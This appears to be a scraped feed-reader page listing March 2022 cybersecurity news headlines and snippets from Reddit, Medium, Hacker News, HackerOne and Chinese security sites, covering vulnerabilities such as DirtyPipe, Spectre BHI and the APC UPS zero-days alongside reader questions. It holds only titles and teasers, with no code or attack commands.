    Demystifying E-Commerce Website Security
    Having an E-Commerce website can have its fair share of risks these days. As a site owner that handles online payments, however, it’s even more important to understand said risks and the best methods of avoiding it from not only impacting your business but your customers as well. Here we’ll be discussing the main aspects that are important to an E-Commerce website, the kinds of vulnerabilities that can impact your business, and how to take better preventative measures. Continue reading Demystifying E-Commerce Website Security at Sucuri Blog.
  • Open

    What is OSINT? (Part 3)
    The rules of the trade Continue reading on Medium »
    ¿Qué es VenApp, la nueva red social de Venezuela?
    Hace unos días un conocido me pasó esto: @VenAppSocial. Al ingresar al perfil lo primero que vi fue la descripción: “¡La nueva red social… Continue reading on Medium »
    What is third-party risk management?
    Third-party risk management (TPRM) is a type of risk management that focuses on identifying and mitigating risks associated with the usage… Continue reading on CodeX »
    What is BYOD (Bring Your Own Device) Policy
    BYOD, or Bring Your Own Device, is a growing trend in which employees use their personal devices for work. Companies that implement BYOD… Continue reading on CodeX »
  • Open

    Branch History Injection - Circumventing Spectre-v2 Hardware Mitigations
    submitted by /u/LordAlfredo [link] [comments]
    Yarn, Pip, Composer & co: Vulnerabilities in popular package managers
    submitted by /u/SonarPaul [link] [comments]
    IDA Pro plugin: query based xref finder for vulnerability research
    submitted by /u/Martypx00 [link] [comments]
    Forgiva Enterprise: A password manager that never saves your passwords.
    submitted by /u/marcusfrex [link] [comments]
  • Open

    Linux Privilege Escalation: DirtyPipe (CVE 2022-0847)
    Introduction CVE 2022-0847 is a privilege escalation vulnerability discovered by Max Kellerman present in Linux Kernel itself post versions 5.8 which allows overwriting data in The post Linux Privilege Escalation: DirtyPipe (CVE 2022-0847) appeared first on Hacking Articles.
    Linux Privilege Escalation: DirtyPipe (CVE 2022-0847)
    Introduction CVE 2022-0847 is a privilege escalation vulnerability discovered by Max Kellerman present in Linux Kernel itself post versions 5.8 which allows overwriting data in The post Linux Privilege Escalation: DirtyPipe (CVE 2022-0847) appeared first on Hacking Articles.
  • Open

    Revisiting Phishing Simulations
    Rethinking the way that we approach phishing as a component of red team operations Continue reading on Posts By SpecterOps Team Members »
  • Open

    SecWiki News 2022-03-09 Review
    用户视角下的网络威胁情报共享平台 by ourren CodeBERT: A Pre-Trained Model for Programming and Natural Languages by ourren 浅谈一下,Linux中基于eBPF的恶意利用与检测机制 by ourren 安全的未来是上下文 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-09 Review
    用户视角下的网络威胁情报共享平台 by ourren CodeBERT: A Pre-Trained Model for Programming and Natural Languages by ourren 浅谈一下,Linux中基于eBPF的恶意利用与检测机制 by ourren 安全的未来是上下文 by ourren 更多最新文章,请访问SecWiki
  • Open

    The Unique Challenges of Companies Born in the Cloud
    There are stark differences between how to manage security policies for on-premises network environments and those that are 100% cloud-based. But many companies continue to struggle with those differences and have experienced plenty of pain as a result. It’s a challenge Rich Mogull has spent years trying to help companies navigate. Mogull, CISO at Firemon, […] The post The Unique Challenges of Companies Born in the Cloud appeared first on Security Weekly.
  • Open

    Triaging A Malicious Docker Container
    submitted by /u/MiguelHzBz [link] [comments]
  • Open

    AutoWarp: Vulnerability in Azure Cloud allows access to all company accounts
    Article URL: https://twitter.com/Yanir_/status/1500863874412724229 Comments URL: https://news.ycombinator.com/item?id=30614889 Points: 5 # Comments: 0
    APC Ups – Critical-Vulnerability
    Article URL: https://www.armis.com/research/tlstorm/ Comments URL: https://news.ycombinator.com/item?id=30612835 Points: 2 # Comments: 0
  • Open

    Back to Basics: The TrustedSec Guide to Strong Cyber Hygiene
    Every day, new challenges, attacks, and vulnerabilities are publicized. Just as attackers and the threat landscape are constantly changing, adapting, and evolving, so too must the Blue Teams and defenders who protect organizations against these threats. While the old adage may have been that attacks are rare and unlikely to happen, a new mentality of... The post Back to Basics: The TrustedSec Guide to Strong Cyber Hygiene appeared first on TrustedSec.
  • Open

    工业控制系统遭受网络攻击数量略有增加
    2021年全球遭受网络攻击的ICS设备比例略有增加,为39.6%,其中2021年下半年遭受网络攻击的比例仅为31.4%。
    专家观点:银行、保险业数字化转型的安全保障
    梆梆安全助力银行业保险业数字化转型
    CIS 2021春日版开启首日直播,10万观众线上为安全打Call
    精彩不止今日,CIS直播间与大家相约明早9点30分,准时守候~
    FreeBuf早报 | 人大代表建议共建数据合规治理平台;谷歌以 54 亿美元收购网络安全公司Mandiant
    谷歌母公司Alphabet周二宣布,计划以约54亿美元收购网络安全公司Mandiant。如果交易达成,它将成为谷歌有史以来第二大收购案。
    网络安全设备相关知识总结
    安全设备 1、防火墙
    APC UPS 零日漏洞可远程烧毁设备、断电
    近期跟进的一组三个关键的零日漏洞TLSstorm可以让黑客从施耐德电气的子公司APC控制不间断电源(UPS)设备
    深入浅出云原生环境信息收集技术(二)
    信息收集在攻击和防御两端都是非常重要的一环,优质的信息收集成果是后续工作顺利展开的首要条件。
  • Open

    【安全通报】2022年3月微软漏洞补丁日修复多个高危漏洞
    近日,微软发布 2022年3月 安全补丁,修复了针对 29 款微软产品的 71 个CVE漏洞 (其中不包括 21 个 Micros...
  • Open

    【安全通报】2022年3月微软漏洞补丁日修复多个高危漏洞
    近日,微软发布 2022年3月 安全补丁,修复了针对 29 款微软产品的 71 个CVE漏洞 (其中不包括 21 个 Micros...
  • Open

    Building a Red Team - Which C2 to pick?
    Hello redteamsec community, my company wants to enhance the actual security testing services from basic assessments and penetration tests to red team engagements. At the moment we are planning the Red Team Infrastructure and I am currently looking for the best pick of a C2 Framework. I checked out the following: - Covenenat - PoshC2 - Metasploit (if you can call it C2, you know what I mean) ​ Further on my list are: - Cobalt Strike - SilentTrinity - APfeil - FactionC2 - Merlin ​ What gives me a hard time is, how to decide on the framework we want to run? Thats why I ask you, what you guys recommend and WHY. Regards! submitted by /u/larryxt [link] [comments]
    A Summary of APT41 Targeting U.S. State Governments
    submitted by /u/dmchell [link] [comments]
  • Open

    Large-ish mp3 library (Full albums, but selection can be hit or miss)
    Edit: After some further searching I had to make an edit, I'm sorry, the Full albums are unreliable for consistency, they are there but it's not guaranteed for every artist so please don't get your hopes up too high if looking for a specific album! The songs that are there are good quality though, that much I can guarantee from my searches! http://www.ashleecadell.com/xyzstorelibrary/ submitted by /u/migali [link] [comments]
  • Open

    Phonebook, the way to DoS a company
    No content preview
    Healing blind injections
    No content preview
    How I created a Trojan Malware — Ethical Hacking
    No content preview
  • Open

    Phonebook, the way to DoS a company
    No content preview
    Healing blind injections
    No content preview
    How I created a Trojan Malware — Ethical Hacking
    No content preview
  • Open

    Phonebook, the way to DoS a company
    No content preview
    Healing blind injections
    No content preview
    How I created a Trojan Malware — Ethical Hacking
    No content preview
  • Open

    付费账单是假,Agent Tesla 攻击是真
    译者:知道创宇404实验室翻译组 原文链接:https://www.fortinet.com/blog/threat-research/fake-purchase-order-used-to-deliver-agent-tesla 自网络钓鱼出现以来,欺诈性的付费账单一直是最常见的诱惑之一。通常的操作方法包括迎合接受者避免债务的愿望,尤其是在可能牵涉到商业利益的情况。 FortiGuard ...
    付费账单是假,Agent Tesla 攻击是真
    译者:知道创宇404实验室翻译组 原文链接:https://www.fortinet.com/blog/threat-research/fake-purchase-order-used-to-deliver-agent-tesla 自网络钓鱼出现以来,欺诈性的付费账单一直是最常见的诱惑之一。通常的操作方法包括迎合接受者避免债务的愿望,尤其是在可能牵涉到商业利益的情况。 FortiGuard ...
  • Open

    付费账单是假,Agent Tesla 攻击是真
    译者:知道创宇404实验室翻译组 原文链接:https://www.fortinet.com/blog/threat-research/fake-purchase-order-used-to-deliver-agent-tesla 自网络钓鱼出现以来,欺诈性的付费账单一直是最常见的诱惑之一。通常的操作方法包括迎合接受者避免债务的愿望,尤其是在可能牵涉到商业利益的情况。 FortiGuard ...
    付费账单是假,Agent Tesla 攻击是真
    译者:知道创宇404实验室翻译组 原文链接:https://www.fortinet.com/blog/threat-research/fake-purchase-order-used-to-deliver-agent-tesla 自网络钓鱼出现以来,欺诈性的付费账单一直是最常见的诱惑之一。通常的操作方法包括迎合接受者避免债务的愿望,尤其是在可能牵涉到商业利益的情况。 FortiGuard ...

  • Open

    Does connecting to a network via Ethernet have any extra security risks vs connecting via WiFi?
    As in, if someone has access to your network via Ethernet does it have any extra security risks to your system compared to if they were connected via WiFi? I'm thinking it depends on the type of internet your connection uses, eg fiber, cable, DSL,etc submitted by /u/computerstuffs [link] [comments]
    How do you stay motivated to learn and prevent burnout?
    I'm already in a somewhat senior engineering role so I'm not forced to learn for school or to get a better job. I always want to keep driving myself to learn new things and stay on the cutting edge of infosec in order to both be more knowledgeable in my current role but also for my own curiosity. Balancing this with a full time+ career as well as family and social obligations feels exhausting sometimes. What do you guys do to stay motivated? submitted by /u/Deliveranc3 [link] [comments]
    What are your favorite data visualizations and analytics?
    Be it for threat hunting or making sure everything's hunky dory, for reporting activity or predicting trends, what do you like to see graphed, and what insights does it give you? I'm looking for more tools for the toolbelt. submitted by /u/Outside-Log-2104 [link] [comments]
    How to open 120 GB SQL file than without my pc ?
    My SSD is low capacity, how to open ? submitted by /u/mefumetsub [link] [comments]
    What was running in the shell when I logged in to a compromised server?
    I have some old sites I run for friends and family on a shared small webhosting place that has a cPanel Linux server. I don't use cPanel for much and don't know all that much about it. I forgot about a WordPress site I was running and someone got it and was able to then compromise the cPanel login. Shame on me for letting a WordPress site sit vulnerable, I know. But it happens. They were then able to get into cPanel. So they loaded up a few WordPress sites with phishing site stuff, and also sent out some phishing emails, all pretty standard stuff I've seen before. Lots of base64 php files and other standard WP hack php stuff. Something I hadn't seen before happened when I SSHed into the server, and I'm not sure what it was or what they had running. I logged in and immediately saw an error that I don't exactly remember, but it was a normal looking error about "no shell", I couldn't do anything, it was just an empty shell. None of the standard commands worked. So I logged in, and something caught my session and had me in... I don't know what. I did ctrl-d or maybe ctrl-c and was back to the normal shell on that server. Things looked normal again. I wasn't even sure I was on the server at first, so I didn't capture the exact errors I was seeing before the return to normal. One thing that I did notice was the title of my session in iterm2 had changed to what looked like a list of files on the server with ^M in between the names. So, something like access-logs^M^application-backups^M^dbs^M^ and so on, all the root level directories. By the time I gave it any thought, I had already cleaned up most everything and killed a couple of running processes. Any idea what I got into when I logged in to there? submitted by /u/blakesterz [link] [comments]
    Can url/ip of microservice being requested by a server be found out?
    I currently have a Ruby on Rails server that does server-side rendering, and it calls one of my microservice. I have Basic Auth implemented for that microservice, but I wonder if it is possible for someone to found where is that microservice and the header/body of my request? Can that be safely prevented by HTTPS? submitted by /u/hksparrowboy [link] [comments]
    How to best visualise risk from vulnerability findings based off CVSS scores?
    We got a report for the vulnerabilities across a system. The findings showed around 40 high vulnerabilities, 150 medium vulnerabilities and 300 low vulnerabilities. The problem I have is how to visually get this across to management as I can make it a simple pie chart but because of the 300 low vulnerabilities dwarfing the 40 high vulnerabilities it doesn't come across particularly well. Does anyone have any ideas? Also we've created a calculation to plot the average score by using cumulative total of all CVSS scores divided by the number of findings and because there's so many low findings with low scores this is causing it to look better than it is as having around 40 high vulnerabilities isn't good. Does anyone have any sort of formulas or calculations I can use to get this risk score across better? Thanks submitted by /u/nimdroid [link] [comments]
    Tool to manage vulnerabilities from different sources?
    OK so the basics are that we're looking for a tool that we can use to group together and manage vulnerabilities found from multiple other sources/scanners (preferably open sorce) We're not looking for anything that will run its own scans; rather, manages already found reports... if that makes sense. At the moment, we're currently using an Excel spreadsheet to group everything together. If anyone has any suggestions that would be a life saver, thank you in advance. submitted by /u/Autumn-shadow [link] [comments]
    Sandvine technology for newbie
    Hello, My friend worked in Blueteam domain as Network security mostly on Firewalls, WAF, IPS etc. solutions. He lost his job earlier and saw an opening at Sandvine which he applied and got a call for interview but he is not sure what type of questions expected. Appreciate if anyone can advise what should he study and what type of questions to be expected and response. TIA submitted by /u/junostik [link] [comments]
    Conducting CMMC - NIST 800-171: Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations at the company I work for
    Hey all, just started a job and I have to run some tests on use cases/artifacts/evidence scenarios. The company wants me to enter their IT Security Labs, and check items out of date such as routers, where firewalls are located, etc. There are 110 controls and I need to align a majority of the company's internal systems and processes with NIST 800-171 for CMMC. What is the best way to do this? submitted by /u/LordCommanderTaurusG [link] [comments]
  • Open

    GRAPHQL cross-tenant IDOR giving write access thought the operation UpdateAtlasApplicationPerson
    Stripe disclosed a bug submitted by bubbounty: https://hackerone.com/reports/1066203 - Bounty: $2500
    objectId in share location can be set to open arbitrary URL or Deeplinks
    Nextcloud disclosed a bug submitted by ctulhu: https://hackerone.com/reports/1337178 - Bounty: $100
    PHP Info Exposing Secrets at https://radio.mtn.bj/info
    MTN Group disclosed a bug submitted by pudsec: https://hackerone.com/reports/1049402
  • Open

    Phonebook, the way to DoS a company
    I had to add my personal info to a phonebook, which I don’t like, so I took down the server ;) Continue reading on InfoSec Write-ups »
    My Pentest Log -9- (Open Redirect Vulnerability)
    Greetings from Kerkoporta to all, Continue reading on Medium »
    Gallery Tryhackme Walkthrough part-1
    File uploading attack Continue reading on Medium »
    Log4shell in google $1337.00
    Looking through the google cloud console for products “https://console.cloud.google.com” to look for bugs i came across VMware Engine. Continue reading on Medium »
    Full Account Takeover due to improper validation of old password
    Hello Hackers and Security community. I’m going to share how I’m able find the bug. Continue reading on Medium »
    ($$$) IDOR via GET Request which can SOLD all User Products
    Hi everyone, Continue reading on Medium »
    Blind-XSS Disappointment
    Blind XSS is a relatively easy bug to find with the availability of tools like XSS-Hunter and Burp collaborator. Continue reading on Medium »
    Misconfiguration OAuth Lead Account Takeover #Part 2
    Here are my bounty bug findings regarding Misconfiguration OAuth Lead Account takeover Part 2 Continue reading on Medium »
    How I managed to make a DDoS attack by exploiting a company’s service — Bug Bounty
    Hello Hackers, I’m MrEmpy, I’m 17 years old and welcome. Today I’m going to tell you about an event that happened to me while I was… Continue reading on Medium »
    Account Enumeration Hacking Tool Created By Python For Finding Username Of Your Target Websits…
    Hi guys in this tutorial you will learn how to create python script for finding username of admin panel of target wordpress website and… Continue reading on Medium »
  • Open

    Reversing embedded device bootloader (U-Boot) - p.1 - Shielder
    submitted by /u/smaury [link] [comments]
    Put an io_uring on it: Exploiting the Linux Kernel
    submitted by /u/eberkut [link] [comments]
    DomainProactive: Security Monitoring for Internet Presence
    submitted by /u/genemcculley [link] [comments]
    CVE-2022-26143: TP240PhoneHome reflection/amplification DDoS attack vector
    submitted by /u/AlexForster [link] [comments]
    Three critical 0-days allow RCE and even physical ignition in APC UPS
    submitted by /u/Subterminal303 [link] [comments]
    Container Escape to Shadow Admin: GKE Autopilot Vulnerabilities
    submitted by /u/YuvalAvra [link] [comments]
    PreAuth RCE in Passcom Cloud Phone Systems found by Kerbit Security Firm.
    submitted by /u/nathanAbejeM [link] [comments]
  • Open

    Ukraine Invasion, Week 2 + more
    Welcome to the 3rd edition of the discursus Protest Analytics newsletter. Continue reading on discursus.io »
    Link Film Dokumenter Bellingcat — Truth in a Post-Truth World
    Sumbubotol.com, November 27, 2019 — Kabar gembira hari ini. Sumbubotol.com mengucapkan selamat kepada Submarine Amsterdam yang berhasil… Continue reading on Sumbu Botol »
  • Open

    BHI: The Newest Spectre Vulnerability Affecting Intel and Arm CPUs
    Article URL: https://www.phoronix.com/scan.php?page=news_item&px=BHI-Spectre-Vulnerability Comments URL: https://news.ycombinator.com/item?id=30603762 Points: 5 # Comments: 0
    Linux has been bitten by its most high-severity vulnerability in years
    Article URL: https://slashdot.org Comments URL: https://news.ycombinator.com/item?id=30601465 Points: 1 # Comments: 0
    Linux has been bitten by its most high-severity vulnerability in years
    Article URL: https://arstechnica.com/information-technology/2022/03/linux-has-been-bitten-by-its-most-high-severity-vulnerability-in-years/ Comments URL: https://news.ycombinator.com/item?id=30596044 Points: 39 # Comments: 10
  • Open

    【安全通报】Linux DirtyPipe本地权限提升漏洞 (CVE-2022-...
    近日,网络上出现 Linux 下 DirtyPipe 本地权限提升漏洞,任何非特权本地用户可通过此漏洞获取root权限。目...
  • Open

    【安全通报】Linux DirtyPipe本地权限提升漏洞 (CVE-2022-...
    近日,网络上出现 Linux 下 DirtyPipe 本地权限提升漏洞,任何非特权本地用户可通过此漏洞获取root权限。目...
  • Open

    CVE-2022-26143: TP240PhoneHome reflection/amplification DDoS attack vector
    Article URL: https://blog.cloudflare.com/cve-2022-26143/ Comments URL: https://news.ycombinator.com/item?id=30602912 Points: 4 # Comments: 0
    Security advisory for the regex crate (CVE-2022-24713)
    Article URL: https://blog.rust-lang.org/2022/03/08/cve-2022-24713.html Comments URL: https://news.ycombinator.com/item?id=30600044 Points: 4 # Comments: 0
  • Open

    Extended Attributes and TCC on macOS
    This blogpost will describe how Transparency, Consent, and Control (TCC) affects extended attributes on macOS Continue reading on Medium »
  • Open

    What is life like as a female digital forensic investigator?
    I am just curious about how females go along in this field as I am currently doing a BSc in Business Management and Information systems and want to be a digital forensic investigator. submitted by /u/SkillKiller3010 [link] [comments]
    Internship Preparation Help for State Forensic Agency
    Hey everybody, I was lucky enough to be considered for a digital forensics internship position with my state's primary forensic agency. I've worked practice cases at my university using FTK and AXIOM, and I have research experience making a forensic image and working a case from beginning to end. Could anyone provide any tips to help me prepare for the interview? I have an incredible opportunity, and I want to make the most of it that I can. submitted by /u/Tuuin [link] [comments]
  • Open

    SecWiki News 2022-03-08 Review
    用户层下API的逆向分析及重构 by ourren 符号和解释 by ourren ROME改造计划 by ourren 记一次自建 Gitea + Drone 实例被挖矿的经历 by ourren 容器安全在野攻击调查 by ourren ATT&CK 在野数据分析 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-08 Review
    用户层下API的逆向分析及重构 by ourren 符号和解释 by ourren ROME改造计划 by ourren 记一次自建 Gitea + Drone 实例被挖矿的经历 by ourren 容器安全在野攻击调查 by ourren ATT&CK 在野数据分析 by Avenger 更多最新文章,请访问SecWiki
  • Open

    Expanding the Hound: Introducing Plaintext Field to Compromised Accounts
    Introduction When doing an Internal Penetration Test, it is not uncommon to run BloodHound at one point or another. In case you are not familiar with BloodHound, it’s a tool that automatically fires off a bunch of LDAP queries and Windows API calls to collect various data in an Active Directory environment. Data can range... The post Expanding the Hound: Introducing Plaintext Field to Compromised Accounts appeared first on TrustedSec.
  • Open

    Ways to Mitigate Software Supply Chain Attacks in 2022
    A supply chain attack, also known as a value-chain attack or a third-party attack, occurs when someone attacks an organization’s system… Continue reading on InfoSec Write-ups »
  • Open

    Ways to Mitigate Software Supply Chain Attacks in 2022
    A supply chain attack, also known as a value-chain attack or a third-party attack, occurs when someone attacks an organization’s system… Continue reading on InfoSec Write-ups »
  • Open

    Ways to Mitigate Software Supply Chain Attacks in 2022
    A supply chain attack, also known as a value-chain attack or a third-party attack, occurs when someone attacks an organization’s system… Continue reading on InfoSec Write-ups »
  • Open

    Container Escape to Shadow Admin: GKE Autopilot Vulnerabilities
    We disclosed several GKE Autopilot vulnerabilities and attack techniques to Google. The issues are now fixed – we provide a technical analysis. The post Container Escape to Shadow Admin: GKE Autopilot Vulnerabilities appeared first on Unit42.
  • Open

    新一代银行木马SharkBot正通过Play Store传播
    SharkBot是一种银行木马,它能够绕过多因素身份验证机制窃取银行账户凭据。
    FreeBuf早报 | 谷歌要求撤销数据泄露诉讼案被驳回;英伟达泄露数据被用于病毒制作
    Alphabet股东起诉谷歌,由于谷歌故意隐瞒安全漏洞,导致用户私人数据泄露。2018年10月,有美国媒体报道称,该事件导致谷歌+近50万用户的个人数据泄露。
    全球黑客卷入乌俄乱局!数字网络战的背后值得深思
    这是数字时代首次爆发的,多个国家级黑客力量入局,且以国家为打击目标,破坏核心关键基础设施的全球级黑客网络战! 【导语】2月24日,乌克兰与俄罗斯之间
    容器安全在野攻击调查
    云原生安全相关的公司雨后春笋般建立起来,各个大云厂商也积极建立自己云原生的安全能力,保护云上客户的资产。
    速看! 2021-2022年23项重大网络犯罪统计数据
    自新冠疫情以来,网络犯罪一直呈上升趋势。专注网络安全的锐成信息在此搜集了2021年最值得注意的网络犯罪统计数据以及行业专家对2022年的互联网安全趋势预测。</
    3月9日相约CIS 2021春日版直播间,万元红包雨等你来抢!
    3月9-10日上午9点30分,锁定CIS2021 Spring·春日版官网,超棒的议题、超nice的有奖活动正等待着您。
    “以数据为中心”的数安实践感悟
    从传统的运营商、能源、医疗、金融等行业,到新兴的互联网行业,都掀起了数据安全建设的浪潮。
    白帽专访丨大家好,我是阿杨,一个全职挖洞的选手!
    「用梦想和勇气去创造,用信念和努力去证明。」 大家好,我是阿杨,自学渗透测试入门安全圈,目前是The loner安全团队的全职挖洞选手,擅长挖掘业务逻辑漏洞,并收获丰厚的奖金激励。
    Firefox再爆两个0Day漏洞,建议尽早升级
    近日,Mozilla对火狐(Firefox)网络浏览器进行了带外安全更新,其中包含了两个影响很大的安全漏洞。
    黑客组织入侵俄罗斯媒体,播放乌克兰战争画面
    俄罗斯媒体遭受网络攻击,出现乌克兰境内的战争画面。
    Metasploit本地使用指南
    在平时做项目的时候,每次开启虚拟机使用会很不方便,配置低的电脑后台开多了还会出现卡顿现象。主要还是在本地安装使用更加的方便快捷,提高了效率。也可以部署在vps等,方便对内网进行渗透。
    FBI:美国52个关键基础设施已被入侵
    截至2022年1月,FBI已经确定,在受攻击的10个关键基础设施中,至少有52个关键基础设施被入侵,涉及关键制造业、能源、金融服务、政府和信息技术领域等领域。
    三星证实黑客窃取了Galaxy设备源代码
    三星于周一证实了其网络遭到了黑客入侵,包括Galaxy手机的源代码在内的机密信息被窃取。
    Coinbase正封锁超25000个与俄罗斯有关的加密货币地址
    3月7日,流行的加密货币交易所 Coinbase宣布,正在封锁25000多个与俄罗斯自然人和实体相关的加密货币地址。
  • Open

    Movies from 1940 until last weekend! Busy site so starts slow(That’s what I’m blaming it on) lol
    submitted by /u/Yankeeslv [link] [comments]
  • Open

    Courtesy of Republic of Bulgaria! - Part Two
    An image is worth a thousand words.Related posts:Courtesy of Republic of Bulgaria!A Profile of a Bulgarian Dipshit and a Kidnapper - An OSINT AnalysisAn Update on My Disappearance and Kidnapping Attempt Courtesy of Bulgarian Law Enforcement Officers from the City of Troyan Bulgaria Circa 2010 - An AnalysisWhat You Get From "Peasant-aria Land" - A New Cyber Security Center - Behold Yourself To the

  • Open

    Pentesting toolkit: all you need to know
    Red Teams use a comprehensive and complete toolkit to expose different platforms and get accurate results when reporting failures, data… Continue reading on Medium »
    Phishing Tools
    Phishing is one of the most serious threats in the digital world. Phishing makes people fool. Phishing email always looks like same as the… Continue reading on Medium »
  • Open

    Why do ISP ask for your SSN when signing up for their services?
    When I was singing up for spectrum they asked for my SSN, I gave to them since. How scared am I? submitted by /u/Empty-Ad1458 [link] [comments]
    What Windows based non Github program would allow me to brute force a TrueCrypt volume?
    Years ago I made some TrueCrypt volumes and forgot about them. I have now found them and forgotten some of the password. I know what the first half was and what some of the second half was but don't know where I put special characters or capital letters. I'm not good with git hub so is there a non-Github program that will let me enter the known parts, I can tell it to try every possible character in certain spaces, and only lower case and uppercase of certain letters i.e. m or M? submitted by /u/TerribleFruit [link] [comments]
    How to Fill My Knowledge Gaps as Quickly as Possible?
    I've been fascinated with cyber/net sec since I was a teenager who wanted to be a '1337 hax0r' (doesn't every nerdy teen wanna be one?). However, I went into Web Development. As I went I did have to learn about defensive coding techniques against SQL injection, path escalation, etc. I worked for financial, insurance and ISO270001 companies and thought I had a reasonable grasp of things since I'd done some sysadmin along the way installing Fail2Ban, Tripwire, etc. I even have the compact red, blue and purple team reference books and Parrot Sec on one partition I occasionally used to play with sec tools and have a Shodan account. I knew about Metasploit but had only done one tutorial. Fast forward to now: I need a career change after dev-burnout. I look into cyber sec and BOOM! Suddenly I see a ton of shit I've never seen before: SIEM? Mitre Att&ck? IoT Bots (have my ESP32 climate monitoring boards become an attack vector?!) TTPs? What on earth happened in the past few years that I missed? I barely recognise the industry anymore. I lifted my finger off the pulse for a few seconds and suddenly it's a different beast entirely. Can some kind soul point me to a good YouTube channel, guide, book, (free/cheap) course that will fill in the gaps I've missed the past few years? submitted by /u/adminsuckdonkeydick [link] [comments]
    Can exact ip addresses be spoofed?
    Recently noticed activity that I didn't really remember doing on an account, but it was from my exact ip address. I have a limited understanding of ip addresses, but spoofing a specific address isn't really possible, as you won't receive anything from the site you are trying to reach, correct? A proxy needs to be used, which is already a set "spoofed" ip, right? . submitted by /u/SaucyBoiTybalt [link] [comments]
    How do I Remove FireEye from a Host?
    Does anyone know where I can find instructions or documentation about removing FireEye from a host? Specifically what registry keys should be deleted? Does anyone have experience with this request? Thank you for taking a look! submitted by /u/ELcup [link] [comments]
    Cyberstalking & Hacking
    Hey r/AskNetsec, I'm getting hacked by two lecturers at my university. I know this and do not want to call the police as I have no evidence of them hacking me. I'm a student and have no money to pay for a digital forensics investigation to be done. How do I stop them from hacking me. They're hacking all my devices and families devices. They also are hacking my email account using a cookie stealer. I have no idea how to stop this and this has become cyberstalking. I'm a South African, I cannot contact the FBI or foreign charity organisations either. I don't want to involve the police since, all they have to do is stop hacking me, then I could get prosecuted for falsely accusing someone of committing a crime. Any advice or help with the situation would be appreciated. Best regards, Anon submitted by /u/Independent_Art_9954 [link] [comments]
    Ask for help, I think I was attacked by phishing
    A few days ago, I happened to see a message from Facebook. I went through the link without thinking and since then, I have since countless spam emails, and several times a day, I have been notified of membership registration and logout for sites that I do not need to log in at all the time. After that, I found out that something was wrong. Perhaps attacked by phishing. The Facebook site on the link I entered was a well-made site very similar to a normal site. In addition, there was no doubt at all because it was possible to log in, search, news articles, and content within the site. Banners, search windows, newsstand windows, login windows, and putters at the bottom were configured in a very similar way. And as a result, I had no choice but to renew all my personal contact information and e-mail addresses. I've only encountered the kind of writing to be careful of phishing sites, but I feel quite bad that I'm actually being attacked. Beyond feeling bad, it is creepy that other people view and use my personal information without permission. In order to prevent access to phishing sites and prevent personal information from being leaked, it is necessary to check if the domain is normal when receiving e-mails or text messages containing links. So I want to ask. What is a way to verify that it is a normal domain when receiving mail and text messages containing links? Is there a service or system that determines a link to a web page normal or dangerous when i enter suspicious link to search box? submitted by /u/Late_Ice_9288 [link] [comments]
    Introduction to Networks materials
    Hey Everyone, I have a new mentee who wants to learn networking. She is completely from a non IT background. Could you please suggest some good basic references/trainings that she can learn from. I know of some CCNA and Comptia instructors who start from quite basics but wanted to check if there is some other non certifications course that she can start with. submitted by /u/wackynerd14 [link] [comments]
    Potential DNS Attacks
    As this is a very hot topic, I'd like to prefix this with me saying I am trying to keep this 100% politics-free and strictly technology-related. That said, I read earlier today that there's a possibility of Russia forcing the use of their own DNS servers as of March 11: https://www.thetechoutlook.com/news/new-release/software-apps/breaking-news-russia-is-preparing-to-disconnect-from-the-global-internet I do not know the validity of the news itself, so I'm hoping to keep this strictly on the technical aspect in the case the order does happen. If we have vendors that hold offices in Russia and can access to our VPN (let's also assume we do not have control over our vendor's offices): could this new order introduce any additional risks to our network? Our VPN should deny all requests with an invalid SSL certificate, but does anyone think the order could introduce any additional risk of DNS attacks? (at least directly?) Assuming users do not ignore SSL warnings, would this be any more of a concern than usual? Thanks in advance! submitted by /u/HPCer [link] [comments]
  • Open

    GitHub - klezVirus/SysWhispers3: SysWhispers on Steroids - AV/EDR evasion via direct system calls.
    submitted by /u/dmchell [link] [comments]
    PROPHET SPIDER Exploits Citrix ShareFile Remote Code Execution Vulnerability CVE-2021-22941 to Deliver Webshell
    submitted by /u/dmchell [link] [comments]
  • Open

    Palined Google OD search went down
    submitted by /u/Raven_Claw7621 [link] [comments]
  • Open

    A new speed milestone for Chrome
    Everyday, billions of people around the world turn to Chrome to get things done quickly on their devices, whether shopping for a new pair of headphones or pulling together a sales report for work. Nothing is more frustrating than having a slow experience while browsing the web. That’s why Chrome has always been focused on building the fastest possible browser since its launch in 2008, without compromising on feature functionality or security. In our first The Fast and the Curious post of 2022, we are thrilled to celebrate how in the M99 release of Chrome we were able to substantially increase the speed of Chrome across all major platforms. We go deep on every platform where Chrome runs to provide the fastest possible experience. We’re excited to announce that in M99, Chrome on Mac has ach…
  • Open

    PHOTON
    (LET’S EXPLORE WEBSITE) Continue reading on Medium »
    Some critical vulnerabilities found with passive analysis on bug bounty programs explained
    This post describes three vulnerabilities found on paid bounty programs along with an overview about how it was found and the performed… Continue reading on InfoSec Write-ups »
    March OSINT Musings
    In light of the current events occurring in Ukraine now would be a good time to: Continue reading on Medium »
  • Open

    Critical cross-account vulnerability in Microsoft Azure automation service
    Article URL: https://orca.security/resources/blog/autowarp-microsoft-azure-automation-service-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30589845 Points: 213 # Comments: 41
    The Dirty Pipe Vulnerability
    Article URL: https://dirtypipe.cm4all.com/ Comments URL: https://news.ycombinator.com/item?id=30586740 Points: 673 # Comments: 232
  • Open

    Web Cache Poisoning leads to Stored XSS
    Glassdoor disclosed a bug submitted by bombon: https://hackerone.com/reports/1424094 - Bounty: $2000
  • Open

    SecWiki News 2022-03-07 Review
    优秀 ATT&CK 项目巡礼 by Avenger SecWiki周刊(第418期) by ourren 软件工程能力漫谈(视频 & PPT) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-07 Review
    优秀 ATT&CK 项目巡礼 by Avenger SecWiki周刊(第418期) by ourren 软件工程能力漫谈(视频 & PPT) by ourren 更多最新文章,请访问SecWiki
  • Open

    Web fuzzing tool written in python
    soon Continue reading on Medium »
  • Open

    Web fuzzing tool written in python
    soon Continue reading on Medium »
  • Open

    Critical Cross-Account Vulnerability Found in Microsoft Azure Automation Service
    submitted by /u/FoShizzleMyWeasle [link] [comments]
    The Dirty Pipe Vulnerability [CVE-2022-0847]
    submitted by /u/moviuro [link] [comments]
    2021 Year In Review - Tools, TTPs, and more!
    submitted by /u/TheDFIRReport [link] [comments]
  • Open

    Computer Forensics and Investigation Project
